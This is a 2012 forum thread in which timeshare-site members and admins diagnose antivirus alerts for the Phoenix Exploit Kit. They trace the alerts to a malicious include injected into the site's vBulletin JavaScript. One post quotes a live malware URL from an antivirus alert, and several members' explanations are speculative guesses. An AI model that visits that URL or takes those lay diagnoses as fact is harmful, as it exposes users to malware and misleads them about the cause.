> I am getting warnings from Kasperski about a trojan in a javascript. The point va was making is Java and javascript are unrelated. Upgrading Java won't help when the problem is in a javascript.
> 
> This is the ONLY web site I see this. I get the warnings on two computers and on Firefox and IE.
> 
> I've opened a case with Kasperski to see what they say.



Exactly, the issue reported by the client AV is a script file on the server (javascript) trying to load a Trojan on client machines by exploiting a security hole in the client side java app.  Patching the client java version only blocks the payload being delivered, if it hasn't already been blocked by AV.

The report I saw indicated this site was blacklisted due to an old version of the bbs software that needs to be upgraded, I'm sure the admins will sort it out.  Until then I'll access using my iPad.


----------



## Picker57 (Sep 7, 2012)

So....is there any danger in just leaving everything as is until it's fixed?  Yes, it's annoying but can it cause any damage?  

---------Zach


----------



## theo (Sep 7, 2012)

*Trojan Horse / Virus alert no longer issued...*

I received no "threat blocked" message today from Avast upon accessing TUG. I don't claim to know how or why, but for me the problem seems to have disappeared .  Smilies are now "back" too.


----------



## Makai Guy (Sep 7, 2012)

theo said:


> I received no "threat blocked" message today from Avast upon accessing TUG. I don't claim to know how or why, but for me the problem seems to have disappeared .  Smilies are now "back" too.



Good news indeed.  
Are others still receiving the warnings?  

As you may imagine, it is very hard for me to research this, since I have never received the warnings here, so there is no way for me to know if any changes I make fix the problem.

My system:
Firefox, currently 15.0.1
AVG 2012 Free Edition, updated daily
Java version installed, ver 7 update 5 - (Edit: However, I seldom have use of Java and generally keep it DISabled in my browser.   Now updated to update 7)


----------



## Dori (Sep 7, 2012)

I am finally able to get in after two days of alerts. YaY!

Dori


----------



## Quiet Pine (Sep 7, 2012)

This morning (6 am in AZ), there hasn't been a single Kaspersky warning about a Trojan threat. It was constant pop-ups all day yesterday. A few days ago, a friend (computer pro) told me not to update Java because there were problems with the latest version. I ignored Java nagging me to update. Still got the Kasperky warnings, though.


----------



## bogey21 (Sep 7, 2012)

No issues here this morning.

George


----------



## Passepartout (Sep 7, 2012)

I haven't tried Firefox yet today. Still using Chrome or Safari (on iPad). I'm a little gun shy after loading new AVG definitions twice yesterday only to have to do 2 system restores. 

Methinks I'll wait for a few more clean reports.

Jim


----------



## T_R_Oglodyte (Sep 7, 2012)

No warnings this morning.


----------



## TheWizz (Sep 7, 2012)

I've made no changes on my end, yet Firefox started working again today with no AVG warnings and the Quick Links menu option is back.


----------



## BM243923 (Sep 7, 2012)

No pop up warnings now, came up earlier this morning.


----------



## Passepartout (Sep 7, 2012)

OK, I'm convinced. I reinstalled a fresh AVG and am back with Firefox. It seems to be OK and all TUG features are working normally so far. I wonder what fixed it? Like Doug (Makai Guy) said- if he doesn't experience the problem, it's hard to make adjustments.

Jim


----------



## TUGBrian (Sep 7, 2012)

you can all thank doug for this one...it even stumped our server host!

Thankfully he was able to get it all working again for us.

Thank you to all of those who provided us with your information to help us identify the problem.


----------



## TheWizz (Sep 7, 2012)

TheWizz said:


> I've made no changes on my end, yet Firefox started working again today with no AVG warnings and the Quick Links menu option is back.



Buggard!  It's back!!!  

Getting the Phoenix Exploit Kit (type 769) messages again...


----------



## T_R_Oglodyte (Sep 7, 2012)

The threat alert is now reoccurring for me.

Firefox browser - all updates installed (latest update was this morning).  AVG antivirus up to date.  Java up to date.


----------



## Art (Sep 7, 2012)

*Java 7*

I have  had zero problems.  I am using Windows 7 with the latest up-dates, Firefox 15.0.1  and  BitDefender 2012.  As far as I can tell (I  can't find it listed as a file anywhere),  I do  not have Java loaded on this  machine.

However, I recently loaded  Java 7 on a Windows XP machine.  While I have  not attempted to access TUG on that  machine, I have received  a variety of 
"you are trying to go someplace unsafe" messages from the McAfee antivirus (as provided by Road Runner) on that machine.

I am  in the group that thinks the Java 7 up-date is a primary candidate  as the source of the TUG access issues.

Art


----------



## Makai Guy (Sep 7, 2012)

T_R_Oglodyte said:


> The threat alert is now reoccurring for me.
> 
> Firefox browser - all updates installed (latest update was this morning).  AVG antivirus up to date.  Java up to date.





TheWizz said:


> Buggard!  It's back!!!
> 
> Getting the Phoenix Exploit Kit (type 769) messages again...



I've just tried something on this.  Please first clear your browser caches to be sure you get fresh copies of the files, and try again.


----------



## Passepartout (Sep 7, 2012)

It's back for me as well within the last hour. I have installed new AVG and definitions today, and per suggestion have cleared the browser cache. Same Phoenix Exploit Kit Type 769. GRRRR!

Jim


----------



## pittle (Sep 7, 2012)

We have gotten warnings using Avast on IE9, Firefox, and Chrome off and on for the past 2 days.


----------



## Makai Guy (Sep 7, 2012)

Makai Guy said:


> I've just tried something on this.


Well, I guess THAT wasn't it ...


----------



## T_R_Oglodyte (Sep 7, 2012)

Makai Guy said:


> T_R_Oglodyte said:
> 
> 
> > The threat alert is now reoccurring for me.
> ...



Cleared cache.  Still getting message.


----------



## Tropical lady (Sep 7, 2012)

*count me in.....*

Kaspersky alerts constantly.  Avast on IE9.  Very annoying!!


----------



## Picker57 (Sep 7, 2012)

Passepartout said:


> It's back for me as well within the last hour. I have installed new AVG and definitions today, and per suggestion have cleared the browser cache. Same Phoenix Exploit Kit Type 769. GRRRR!
> 
> Jim



Yep, it's back on mine as well - 3 times in the past couple of minutes -and that same message.  It was clear for a few hours earlier. WEIRD that it's picking on TUG.  Is it happening to threads other than 'Lounge'?  

---------------Zach


----------



## timeos2 (Sep 7, 2012)

Art said:


> I have  had zero problems.  I am using Windows 7 with the latest up-dates, Firefox 15.0.1  and  BitDefender 2012.  As far as I can tell (I  can't find it listed as a file anywhere),  I do  not have Java loaded on this  machine.
> 
> However, I recently loaded  Java 7 on a Windows XP machine.  While I have  not attempted to access TUG on that  machine, I have received  a variety of
> "you are trying to go someplace unsafe" messages from the McAfee antivirus (as provided by Road Runner) on that machine.
> ...



It seems blaming the Java update is wrong as many have it &  have no problems (I'm one).  The fact remains only certain anti-virus implementations are reacting by blocking. It does seem to be a false positive being triggered by other issues in the specific client.  

Some have rolled back or forward to change the java version & changed nothing.  Keep looking.


----------



## dioxide45 (Sep 7, 2012)

Picker57 said:


> So....is there any danger in just leaving everything as is until it's fixed?  Yes, it's annoying but can it cause any damage?
> 
> ---------Zach



Well, if you were like me you would actually have the Trojan run and try to get you to click on a program to try to get you to "scan your computer". My guess is that the program would find a bogus virus and try to get you to pay to remove it. When you learn that the program is in fact the problem, you could probably pay even more to get it removed. However once sucked in, you are toast.


----------



## TUGBrian (Sep 7, 2012)

id suggest anyone (even those without the problem) use malwarebytes antimalware software...its quite effective at finding nonsense and removing it on your computer.

as we have seen, not all virus scanners even detect a problem!

its free here

http://fileforum.betanews.com/detail/Malwarebytes-AntiMalware/1186760019/1


----------



## Picker57 (Sep 7, 2012)

Picker57 said:


> Is it happening to threads other than 'Lounge'?
> 
> ---------------Zach




Damn...just found the answer: AFFIRMATIVE ! Will do an AVG full body scan (oh wait....that' at  the airport) andn download the malware thingy. 

----------Zach


----------



## TUGBrian (Sep 7, 2012)

quick poll.

how many of you (if any at all) are getting this by going through a bookmark or a linke to the forums.

for those of you that do, and get the message...open up a NEW browswer window and just type in tugbbs.com/forums

please tell me if you get the virus warning


----------



## Phill12 (Sep 7, 2012)

I have been getting same notices! Just coming to this posting my protection has blocked eight Trojan warnings!

 Brian I went back and return to Tugg as you said and it made no difference! Every move I make gives me warning of Trogan blocked!

 PHIL


----------



## TUGBrian (Sep 7, 2012)

were you browsing to TUG each time using a link/bookmark?  or did you type tugbbs.com/forums into a fresh browser?


----------



## TUGBrian (Sep 7, 2012)

anyone still getting the alerts at all now?


----------



## Passepartout (Sep 7, 2012)

I downloaded the Malwarebytes, scanned the computer, restarted, opened TUG in a new window. BANG, virus warning is back. 

I'm feeling that users are being asked to do untried, untested moves when with all due respect,* I feel that the problem has something to do with TUGBBS- not members' computers. It doesn't seem to affect other parts of TUG, like classifieds, reviews. Just BBS.*

Oh, I tried Safari as well as Firefox and Chrome. Chrome is the only one that seems unaffected.

Meanwhile back to Chrome for my BBSing til this is figured out.

Jim


----------



## TUGBrian (Sep 7, 2012)

i suggested malwarebytes as a very useful tool to clean computers that might already be infected, not to cure this problem.

(also note that classifieds/reviews/etc are on completely different servers)


----------



## TUGBrian (Sep 7, 2012)

we replaced the global.js file at approx 6:43pm...did you get the message after that Jim?


----------



## #1 Cowboys Fan (Sep 7, 2012)

TUGBrian said:


> anyone still getting the alerts at all now?



Brian,

This 'computer lingo' is WAAAAY above my head,

BUT, I just tried to type in

www.tug2.net

then I went to TUG Forums, and got the
AVG has BLOCKED this threat message.

(Just trying to add info, to solve the problem)

Pat


----------



## Makai Guy (Sep 7, 2012)

Tried something else (Brian, the upload we just emailed about).   Please clear caches, try again, and report back.  (Edit: I see Brian already posted about this.)


----------



## TUGBrian (Sep 7, 2012)

just to confirm...you typed in tug2.net   not tugbbs.com and got the message?


----------



## Passepartout (Sep 7, 2012)

TUGBrian said:


> we replaced the global.js file at approx 6:43pm...did you get the message after that Jim?



Yes. At 6:49, just seconds ago.


----------



## TUGBrian (Sep 7, 2012)

do you get the same message going to tug2.net?


----------



## Passepartout (Sep 7, 2012)

TUGBrian said:


> do you get the same message going to tug2.net?



No, it seems to just affect the BBS. Reviews, classifieds, all that other stuff in the red stripe seem clean.


----------



## TUGBrian (Sep 7, 2012)

ok...if tug home, advice, and faq all work...its definately the forums.

marketplace and reviews are on a different server.


----------



## T_R_Oglodyte (Sep 7, 2012)

Just cleared cache. Still getting the message on the BBS.  All tug2.net addresses checked were fine.


----------



## TUGBrian (Sep 7, 2012)

id give anything to be able to reproduce this error on my machine...i hate asking you guys to keep doing all this.


----------



## Passepartout (Sep 7, 2012)

That might help- just being able to identify the server that's bugged.


----------



## Htoo0 (Sep 7, 2012)

Still here for me too. But I do appreciate your efforts. BTW, the 'smilies' no longer work for me since this started. Also, I downloaded the latest version of Firefox yesterday but I get it in IE as well.


----------



## T_R_Oglodyte (Sep 7, 2012)

Htoo0 said:


> Still here for me too. But I do appreciate your efforts. BTW, the 'smilies' no longer work for me since this started.



The multi-quote option for posting replies also does not work. I suspect there are a lot of similar functionalities that are being affected.


----------



## dioxide45 (Sep 7, 2012)

Still no issues on Chrome. Smilies work fine though I have never had a quicklink button. Chrome doesn't work the same, I guess it doesn't support Java Script the same way other browsers do?


----------



## TUGBrian (Sep 7, 2012)

ill admit im completely baffled as to why it seems to:

1. only impact some of you (despite same browsers)
2. doesnt show up on my computer at all despite me running all 3 browsers, and avg
3. the quick links/smiles/yadda arent broken for everyone.

none of this makes sense at all.


----------



## Passepartout (Sep 7, 2012)

TUGBrian said:


> Why it seems to:
> 1. only impact some of you
> 
> none of this makes sense at all.



We're just *special*


----------



## Htoo0 (Sep 7, 2012)

Probably no help but today AVG has a show details function which is now working. It states:  Process name: C:\Program Files\MozillaFireFox\firefox.exe and Process ID: 152 while in firefox. For IE it states Process name: C:\Program Files\Internet Explorer\iexplore.exe and Process ID: 2880 although I just hit details again and it changed the process ID to 2252 now that I'm back in FF.


----------



## TUGBrian (Sep 7, 2012)

thats ok...thats something local to your computer.


----------



## va_traveller (Sep 7, 2012)

Ron98GT said:


> Did you even open and READ any of the attached files?  You disagree with "Java", the company, that admits they have buggy code?  Java themselves stated "TROJAN" virus.  Also, there is no "Upgrade", since the latest versions are buggy, again read my whole posting and the attached links. Do a Google search.  I'm not making this stuff up, talk to Java and see what they say.
> 
> I believe your the first to mention "JAVASCRIPT" warnings.  Others have stated "Trojan", which again relates back to Java, an Oracle company.



Sir, I am not trying to pick a fight with you, but the issues you found were with trojan APPLETs that are downloaded into the java cache and executed without the users knowledge. 

A "Trojan" is a program in ~any~ language that pretends to do one thing, but does another. There can be (as you found) trojans in java, trojans in javascript (which is the case here), and trojans in many many forms. (http://en.wikipedia.org/wiki/Trojan_horse_(computing))

The issue here, while similar in that its a trojan, is not java based. The cases you found are indeed an issue, if you were downloading an applet that was written by an miscreant 12 year old. In this case, the issue is a javascript file, probably written by a miscreant 10 year old .


----------



## va_traveller (Sep 7, 2012)

Since we are keeping track, today AVAST blocked something different.

avast! blocked the virus:
http://yeare.pro/nwuvgyzxwwipadc/

Thats all I got. I would check any 3rd party advertising that may appear. Sometimes these can be injected with crap.

Greg


----------



## va_traveller (Sep 7, 2012)

TUGBrian said:


> quick poll.
> 
> how many of you (if any at all) are getting this by going through a bookmark or a linke to the forums.
> 
> ...



Opened it in IE (which I rarely use) and got the same warning I posted above. S


----------



## dioxide45 (Sep 7, 2012)

va_traveller said:


> Since we are keeping track, today AVAST blocked something different.
> 
> avast! blocked the virus:
> http://yeare.pro/nwuvgyzxwwipadc/
> ...



I don't think it is advertising. Something I have noticed about the TUG forums is that they have no advertising. FlyerTalk a few weeks ago was having a problem with some ads prompting a popup box about viruses and to run a scan. All that was available was an okay button. I am sure that clicking the okay button would have installed or run some nasty stuff. Clicking the red X didn't help, the only way out was to kill IE through Task Manager. That issue on FlyerTalk is why I switched to Chrome.

I don't know why the TUG forums don't have ads, I have only seen the ads in the TUG2.net site.


----------



## TUGBrian (Sep 7, 2012)

is anyone having the virus warning after 11:30pm eastern?


----------



## Passepartout (Sep 7, 2012)

TUGBrian said:


> is anyone having the virus warning after 11:30pm eastern?



Yup. Still doing it at 11:42


----------



## easyrider (Sep 7, 2012)

T_R_Oglodyte said:


> The multi-quote option for posting replies also does not work. I suspect there are a lot of similar functionalities that are being affected.





TUGBrian said:


> ill admit im completely baffled as to why it seems to:
> 
> 1. only impact some of you (despite same browsers)
> 2. doesnt show up on my computer at all despite me running all 3 browsers, and avg
> ...





Passepartout said:


> We're just *special*



 :annoyed: :whoopie: :hysterical: 







ITS STILL WORKING FOR ME


I did lose spellcheck a few months ago.  

Bill 

SQUID


----------



## Htoo0 (Sep 8, 2012)

I'm still getting it and I think it's 11:54 eastern. (10:54 Central) I've updated and ran MalwareBytes, Spybot S&D, AVG, and Firefox. No problems found. Cleared cache and ran a registry cleaner as well. Not sure what else I can do at this point. This is my laptop and I get the message both at work and home so I'm guessing different IP's etc. Ah well, maybe I'll fire up the old desktop and see what happens. Thanks again for all the time being dedicated to solving a problem for just a few of us.


----------



## MichaelColey (Sep 8, 2012)

I'm still getting the warning as well.  I cleared my Temporary Internet Files, to no avail.


----------



## bccash63 (Sep 8, 2012)

I am still getting it. dawn


----------



## pammex (Sep 8, 2012)

yes I am getting it as well....using Firefox...and appears with everything you do,go from on thread to another etc...no smileys...working...


----------



## Htoo0 (Sep 8, 2012)

Well, it's not on my desktop. Vista Ultimate, AVG, Firefox, and it updated AVG, Adobe and Java. But still no problem.:whoopie:


----------



## piper_chuck (Sep 8, 2012)

Still getting it here. Tried clearing Firefox cache, deleted all cookies containing tugbbs and restarted Firefox. Still getting. Installed Malwarebytes, nothing found. Opened an IE window, typed tugbbs.com and got the warning.


----------



## piper_chuck (Sep 8, 2012)

Found a way to make the warnings go away in Firefox and IE. 

For Firefox go to Tools->Options. Click on the Content tab and uncheck the Enable JavaScript box. 

For IE follow the directions listed here: http://browsers.about.com/od/internetexplorertutorials/ss/disable-javascript-ie9_6.htm

I do not want to run this way long term, but it does provide relief for people until the source of the problem is identified and corrected.

Edit: Discovered yahoo mail needs javascript to work correctly. Probably lots of other sites too.


----------



## va_traveller (Sep 8, 2012)

piper_chuck said:


> Found a way to make the warnings go away in Firefox and IE.
> 
> For Firefox go to Tools->Options. Click on the Content tab and uncheck the Enable JavaScript box.
> 
> ...





Most sites these days are so heavily dependent on javascript, your online experience would be horrible. This is kinda like going hunting with an empty gun...you can see the animals, point the gun, buuuuuuuuuut...


----------



## BM243923 (Sep 8, 2012)

Its back again on my laptop that uses Vista.

Has never been a problem on my Regular computer that uses Windows 7


----------



## TUGBrian (Sep 8, 2012)

can anyone else whos getting it regularly confirm that disabling javascript (per the instrctions above) makes it go away on your local computer?

(note you can turn it back on, im just fishing for a common theme here)


----------



## Passepartout (Sep 8, 2012)

I disabled JavaScript and the virus warning did not come back, but neither did any formatting or smilies or QuickLinks.

Meanwhile back to Chrome.

Jim


----------



## Passepartout (Sep 8, 2012)

Brian, The stuff going on here and the 'Strange Happenings' in this thread http://tugbbs.com/forums/showthread.php?t=178356 are linked. Maybe the threads should be merged? 

There seems to be new info including a .exe file name contained in the last post in the above thread. 

Hope you find the culprit soon. It seems there are more affected machines.

Jim


----------



## T_R_Oglodyte (Sep 8, 2012)

TUGBrian said:


> can anyone else whos getting it regularly confirm that disabling javascript (per the instrctions above) makes it go away on your local computer?
> 
> (note you can turn it back on, im just fishing for a common theme here)


Disabling JavaScript makes the warning go away.  (It also eliminates some of the site functionalities - in addition to no smilies, Quick Links doesn't work, and clicking the multi-quote feature has the same effect as clicking the Quote button (i.e., it immediately opens a Quote reply window).


----------



## Carolyn (Sep 8, 2012)

I also had an inquiry about a timeshare I am trying to rent go to my Gmail spam folder. The perspective renter also had Gmail. This happened on 8/31. Just found it last night. May have missed out on a renter


----------



## Talent312 (Sep 8, 2012)

I'm not getting any more warnings and have full functionality at home.

But my office 'puter using a stale version of Symantic did not intercept "Live Security Platform" which seems to have installed itself the moment I opened TUG.

I should'a known better, and now I have to take it to my IT-Admin to clean.


----------



## piper_chuck (Sep 8, 2012)

Talent312 said:


> I'm not getting any more warnings and have full functionality at home.
> 
> But my office 'puter using a stale version of Symantic did not intercept "Live Security Platform" which seems to have installed itself the moment I opened TUG.
> 
> I should'a known better, and now I have to take it to my IT-Admin to clean.



Sounds like the warning many of us are getting is not a false positive.


----------



## SmithOp (Sep 8, 2012)

piper_chuck said:


> Sounds like the warning many of us are getting is not a false positive.



This is not to be taken lightly if there is a payload being distributed by a rogue javascript on the tug bbs server.  Until now the discussion centered on false positive by av scanner updates or java updates.  I can clear up a few questions about who may get infected, I hope Talent can confirm based on his company machine being compromised that it was Win XP or Vista.

- Chrome has a feature called sandbox that blocks JavaScript injection and execution, that's why no warnings.
- Windows 7 has better security and blocks it if kept up to date.
- Win XP or Vista using IE or Firefox with lax AV are vulnerable. 
- if your AV blocks all the scripts here, it's just the annoyance of no formatting tools and shortcuts loading, be thankful you didn't get the virus payload.


----------



## T_R_Oglodyte (Sep 8, 2012)

Carolyn said:


> I also had an inquiry about a timeshare I am trying to rent go to my Gmail spam folder. The perspective renter also had Gmail. This happened on 8/31. Just found it last night. May have missed out on a renter



I don't think that has anything to do with the security issue being discussed here.  That is strictly an issue involving the spam filter settings on *your* G-mail account. Also, the TUG Marketplace is hosted on a different server, which is not involved with the security issues.

*****

Bottom line - if you want to make sure messages like this don't get routed to your spam folder, you need to change your e-mail spam settings to be less restrictive.


----------



## dioxide45 (Sep 8, 2012)

piper_chuck said:


> Sounds like the warning many of us are getting is not a false positive.



Correct, your AV is blocking the file from being delivered. Others, myself included, have reported having a file downloaded to their system. All seems clean now though as I was able to delete the files and ran a complete system scan which appears to have cleaned everything up.


----------



## dioxide45 (Sep 8, 2012)

SmithOp said:


> - Win XP or Vista using IE or Firefox with lax AV are vulnerable.



Not sure it is necessarily lax AV. Some AV programs are just better than others and some are better at certain threats than others. None are perfect.


----------



## dioxide45 (Sep 8, 2012)

Carolyn said:


> I also had an inquiry about a timeshare I am trying to rent go to my Gmail spam folder. The perspective renter also had Gmail. This happened on 8/31. Just found it last night. May have missed out on a renter



I don't know how TUG e-mails are delivered for marketplace ads. Does it appear to come from the renter's email address, or do they come from a generic TUG address? If it is a generic address, add that e-mail address to your contact list and it should prevent them from being delivered to your junk box.


----------



## Htoo0 (Sep 8, 2012)

Disabled javascript with Firefox and the warning was gone. Turned it back on and I have the warning.


----------



## Talent312 (Sep 8, 2012)

SmithOp said:


> I can clear up a few questions about who may get infected, I hope Talent can confirm based on his company machine being compromised that it was Win XP or Vista.



Yep... The office 'puter runs Win XP Pro.
It happened yesterday ~ 5PM, after our IT guy had left for the day.
This thing is a real tuff nut.


----------



## #1 Cowboys Fan (Sep 8, 2012)

I'm not getting those 'THREAT' warnings anymore from AVG---but perhaps I need some TUGgers advice, if things still aren't OKAY  ??

Pat


----------



## Passepartout (Sep 8, 2012)

I as hoping you were onto something there Pat, but my AVG is still showing the threat and clearing it. I'm still using Chrome since I don't want the hassle.

I'm waiting for someone to decide it's a local problem and wipes their hard drive and reinstalls the whole mess. I'm not going to be the first.

Jim


----------



## dioxide45 (Sep 8, 2012)

Passepartout said:


> I as hoping you were onto something there Pat, but my AVG is still showing the threat and clearing it. I'm still using Chrome since I don't want the hassle.
> 
> I'm waiting for someone to decide it's a local problem and wipes their hard drive and reinstalls the whole mess. I'm not going to be the first.
> 
> Jim



I don't think it is a local system issue as someone eluded to. It is affecting too many people and it only seems to be happening with TUG. There is a problem with the JS on TUG or there something in this version of vBulletin that has been exploited.


----------



## T_R_Oglodyte (Sep 8, 2012)

#1 Cowboys Fan said:


> I'm not getting those 'THREAT' warnings anymore from AVG---but perhaps I need some TUGgers advice, if things still aren't OKAY  ??
> 
> Pat


I very strongly suspect the site has been hacked with the Phoenix Exploit Kit lurking somewhere in the vbulletin java script.

If you were getting alerts from AVG, but you no longer *and* you haven't disabled JavaScript (see discussion upthread to figure out whether you have JavaScript disabled) or switched to the Chrome browser, I would be worried.  The code is still lurking in the site and should be setting off your AVG.


----------



## T_R_Oglodyte (Sep 8, 2012)

dioxide45 said:


> I don't think it is a local system issue as someone eluded to. It is affecting too many people and it only seems to be happening with TUG. There is a problem with the JS on TUG or there something in this version of vBulletin that has been exploited.



My AVG identifies vbulletin_global.js as the offending file.  I'm not catching the warning at other vBulletin sites, just TUG.  So I suspect it's TUG only and I think it likely the TUGBBS.com server has been compromised.


----------



## dioxide45 (Sep 8, 2012)

T_R_Oglodyte said:


> My AVG identifies vbulletin_global.js as the offending file.  I'm not catching the warning at other vBulletin sites, just TUG.  So I suspect it's TUG only and I think it likely the TUGBBS.com server has been compromised.



TUG is using a very old version of vBulletin. One that may no longer be supported by vBulletin. Perhaps there is a security issue that has been exploited somehow but is not an issue with newer versions.

I find it rather concerning that the admin has not been able to duplicate this issue and no one on their server side has either. Without duplicating it, it makes it very hard to diagnose.


----------



## Makai Guy (Sep 8, 2012)

dioxide45 said:


> TUG is using a very old version of vBulletin. .... Perhaps there is a security issue that has been exploited somehow but is not an issue with newer versions.


I think this is highly likely. The problem in updating is that we are running a highly modified version which makes adapting all our modifications to a new version very difficult.



> I find it rather concerning that the admin has not been able to duplicate this issue and no one on their server side has either. Without duplicating it, it makes it very hard to diagnose.


Pretty disconcerting here, too, believe me.  I get none of the warnings on either computer.


----------



## TUGBrian (Sep 8, 2012)

ive even tried all 3 computers here.

winxp running ie9/firefox and chrome
winxp running ie8
win2k3 running ie8

all running avg

lkajsdkfjasdf


----------



## Passepartout (Sep 8, 2012)

Getting kinda used to Chrome. That'll drive the step son nutz! The big G is sort of personna non grata around his place since he lives in Redmond and works for Bill. He tolerates me using Firefox, but I might have to hide the laptop with those magazines with the pictures I shouldn't be looking at (airplanes and mud races and fly fishing).

Boy, the sacrifices I endure for TUG! 

Jim


----------



## T_R_Oglodyte (Sep 8, 2012)

Makai Guy said:


> I think this is highly likely. The problem in updating is that we are running a highly modified version which makes adapting all our modifications to a new version very difficult.
> 
> 
> Pretty disconcerting here, too, believe me.  I get none of the warnings on either computer.



Reading about the reported behavior of the Phoenix Exploit Kit, what people are reporting here matches pretty closely the described characteristics of the Phoenix Exploit. That, plus a credible report of someone having actually received a payload, strongly suggests to me that the code has been corrupted/hacked and these aren't phantom positives.


----------



## Makai Guy (Sep 8, 2012)

T_R_Oglodyte said:


> Reading about the reported behavior of the Phoenix Exploit Kit, what people are reporting here matches pretty closely the described characteristics of the Phoenix Exploit. That, plus a credible report of someone having actually received a payload, strongly suggests to me that the code has been corrupted/hacked and these aren't phantom positives.


I don't think they're phantom positives either, I just don't get them here.

Everyone please continue to report your complete warning messages.  Sometimes they will contain a hint that can be helpful in tracking this stuff down, especially if they change from previous reports.


----------



## T_R_Oglodyte (Sep 8, 2012)

Makai Guy said:


> I don't think they're phantom positives either, I just don't get them here.
> 
> Everyone please continue to report your complete warning messages.  Sometimes they will contain a hint that can be helpful in tracking this stuff down, especially if they change from previous reports.


Here is a screen snip with the AVG warning that I get:


----------



## Makai Guy (Sep 8, 2012)

Thanks, Steve.  FWIW, we've been all over the vbulletin_global.js file six ways from Sunday.   We have even replaced the file with a copy from an untouched virgin download of the full vBulletin 3.6.4 package from Jelsoft, yet the same notice prevails.


----------



## Passepartout (Sep 8, 2012)

I get the identical message (I'd show you if I knew how to do a screen shot) and there is nothing relative in the 'More Info' or 'Details.'

Jim


----------



## MichaelColey (Sep 8, 2012)

I disabled AVG and turned on Fiddler (a packet analyzer), then loaded a page on TUG.  I looked at the results I got back when vbulletin_global.js was requested, and I noticed the following additional code appended at the bottom of the file:



> <br />
> <b>Warning</b>: include(vbulletin_css/styles.css) [<a href='function.include'>function.include</a>]: failed to open stream: No such file or directory in <b>/home/tugbbsc/public_html/forums/clientscript/vbulletin_global.js</b> on line <b>1730</b><br />
> <br />
> <b>Warning</b>: include() [<a href='function.include'>function.include</a>]: Failed opening 'vbulletin_css/styles.css' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/tugbbsc/public_html/forums/clientscript/vbulletin_global.js</b> on line <b>1730</b><br />


 
To me, it looks like a misconfiguration somewhere, rather than a virus.


----------



## Makai Guy (Sep 8, 2012)

MichaelColey said:


> I disabled AVG and turned on Fiddler (a packet analyzer), then loaded a page on TUG.  I looked at the results I got back when vbulletin_global.js was requested, and I noticed the following additional code appended at the bottom of the file:
> 
> 
> 
> To me, it looks like a misconfiguration somewhere, rather than a virus.



HA!  I just stumbled on the styles.css file via another means.  It is definitely an infusion of malware, similar to stuff we've found in the past, and I've disabled it.  This error message tells us whatever is trying to call it now can't find it.  Now to analyze your warning and see where it leads us ..


----------



## Htoo0 (Sep 8, 2012)

Well, I can tell you it's now gone on mine!  Smilies still don't work but it certainly is nice not to get the warning in the middle of the page. Thanks. (Also, clicking Quick Links changes it to Open Buddy List and Search changes to Mark Forums Read.) All I've noticed so far.


----------



## MichaelColey (Sep 8, 2012)

The error appears to be gone for me now, too, but the Javascript errors (affecting some of the vB functionality) are still there, probably related to the broken include I mentioned above. For instance:





> Message: Syntax errorLine: 1730Char: 1Code: 0URI: http://tugbbs.com/forums/clientscript/vbulletin_global.js?v=364


----------



## Makai Guy (Sep 8, 2012)

Michael - can you repeat your Fiddler check and see if the warning is now gone?


----------



## MichaelColey (Sep 8, 2012)

Makai Guy said:


> Michael - can you repeat your Fiddler check and see if the warning is now gone?


Yes, it's gone now.  Also, I don't see any JavaScript errors and the vB functionality (at least what I've tried that wasn't working before) appears to be fixed.

I think you got it!


----------



## piper_chuck (Sep 8, 2012)

The Kasperski warning I've been receiving for a while is now gone.


----------



## SmithOp (Sep 8, 2012)

Makai Guy said:


> HA!  I just stumbled on the styles.css file via another means.  It is definitely an infusion of malware, similar to stuff we've found in the past, and I've disabled it.  This error message tells us whatever is trying to call it now can't find it.  Now to analyze your warning and see where it leads us ..



I think you are on the right track, they have buried something that adds some obfuscated code pointing to a trojan server.  I used a different tool and it tried to execute 2 different trojans but Malwarebytes blocked it.

I also see a lot of advice to change your passwords and check your htaccess file.


----------



## Makai Guy (Sep 8, 2012)

MichaelColey said:


> Yes, it's gone now. Also, I don't see any JavaScript errors and the vB functionality (at least what I've tried that wasn't working before) appears to be fixed.
> 
> I think you got it!



I hope you're right.  Let's hope it stays "got" this time.

 This stuff is sure becoming a pain in the wazoobie.


----------



## MichaelColey (Sep 8, 2012)

The include error appears to be back.


----------



## Makai Guy (Sep 8, 2012)

MichaelColey said:


> The include error appears to be back.


ARRGGHH!  That sux.   I've fixed it again, but who knows how long it will last?


----------



## Passepartout (Sep 8, 2012)

*Finally* it looks like you know what rock to look under. It's working fine now, even formatting. And on Firefox, to boot.  Oh, and Quick Links don't do their dance and disappear either! Woo-Hoo!

Thanks Doug- and to Michael for the tip.
    

Jim


----------



## T_R_Oglodyte (Sep 8, 2012)

FWIW - not getting the error message now with JS enabled (Firefox and Windows 7, both current).  Also the site microfunctionalities that were not working before are now operating.


----------



## PearlCity (Sep 9, 2012)

Seems to be gone but I think it was a virus because my other computer that didn't have a firewall (I know I know.. my husband re-did it a few months ago and forgot to install the firewall) had some problems right when this whole thing started.......


----------



## KauaiMark (Sep 9, 2012)

*Kasperski's happy*



piper_chuck said:


> The Kasperski warning I've been receiving for a while is now gone.



TUG seems trojan free using IE9 or Firefox again!!!

...Mark


----------



## Dori (Sep 9, 2012)

YaY! I am able to get my TUG fix this morning.   Sure did miss you guys over the past few days! Thanks for all your hard work in tracking down the problems.

Dori


----------



## Picker57 (Sep 9, 2012)

Dori said:


> YaY! I am able to get my TUG fix this morning.   Sure did miss you guys over the past few days! Thanks for all your hard work in tracking down the problems.
> 
> Dori



Ditto here;  What a great community ! Happy travels all. 

------------Zach


----------



## kjsgrammy (Sep 9, 2012)

Dori said:


> YaY! I am able to get my TUG fix this morning.   Sure did miss you guys over the past few days! Thanks for all your hard work in tracking down the problems.
> 
> Dori



Ditto!  Thanks to all for the fix  So glad to be able to get back into TUG!


----------



## Picker57 (Sep 9, 2012)

From the ''Don't count your chickens' file.....IT'S BACK (at least on my machine). It's the same "Exploit Phoenix....Type 769" etc. message.  I haven't switched to Chrome yet because it seemed to go away anyway....at times.  Inasmuch as I'm barely knowledgeable to turn the computer ON, I'm still wondering if there's any potential damage by just letting it go. "Annoying" I can handle, "Harmful" not so much.      

Also wondering, are Mac users getting this also?  

------------Zach


----------



## Makai Guy (Sep 9, 2012)

Picker57 said:


> From the ''Don't count your chickens' file.....IT'S BACK (at least on my machine). It's the same "Exploit Phoenix....Type 769" etc. message.  I haven't switched to Chrome yet because it seemed to go away anyway....at times.  Inasmuch as I'm barely knowledgeable to turn the computer ON, I'm still wondering if there's any potential damage by just letting it go. "Annoying" I can handle, "Harmful" not so much.
> 
> Also wondering, are Mac users getting this also?
> 
> ------------Zach


Please try it again now.


----------



